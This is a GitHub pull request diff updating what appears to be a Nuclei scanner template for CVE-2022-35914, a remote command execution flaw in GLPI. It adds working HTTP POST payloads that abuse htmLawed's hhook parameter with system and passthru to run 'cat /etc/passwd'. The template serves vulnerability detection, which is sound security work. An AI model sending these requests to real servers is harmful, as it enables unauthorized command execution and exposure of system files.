Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Updated CVE-2022-35914 template #10279

Merged
merged 4 commits into from
Jul 15, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 22 additions & 2 deletions http/cves/2022/CVE-2022-35914.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@ id: CVE-2022-35914

info:
name: GLPI <=10.0.2 - Remote Command Execution
author: For3stCo1d
author: For3stCo1d,allendemoura
severity: critical
description: |
GLPI through 10.0.2 is susceptible to remote command execution injection in /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module.
Expand All @@ -16,6 +16,8 @@ info:
- http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
- https://nvd.nist.gov/vuln/detail/CVE-2022-35914
- https://github.com/glpi-project/glpi/releases
- https://senderend.medium.com/pg-practice-box-deep-dive-glpi-c3a1cf1520f8
- https://github.com/allendemoura/CVE-2022-35914
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
Expand All @@ -39,6 +41,8 @@ info:
tags: cve,cve2022,glpi,rce,kev,glpi-project
variables:
cmd: "cat+/etc/passwd"
execFunc1: "system"
execFunc2: "passthru"

http:
- raw:
Expand All @@ -49,6 +53,22 @@ http:
Cookie: sid=foo

sid=foo&hhook=exec&text={{cmd}}
- raw:
- |
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: sid=foo

sid=foo&text={{execFunc1}}&hfoo={{cmd}}&hhook=array_map
- raw:
- |
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: sid=foo

sid=foo&text={{execFunc2}}&hfoo={{cmd}}&hhook=array_map

matchers-condition: and
matchers:
Expand All @@ -60,4 +80,4 @@ http:
- type: status
status:
- 200
# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950
# digest: 490a00463044022031f4721d255682854c1f6e4bd4388e92d46d517fab31f98380587eb1a48affb80220778ad6d9444db683bd4d83ff14f1b4c8bdd98b8a158995518fb94c3fe5cc4a19:922c64590222798bb761d5b6d8e72950
Loading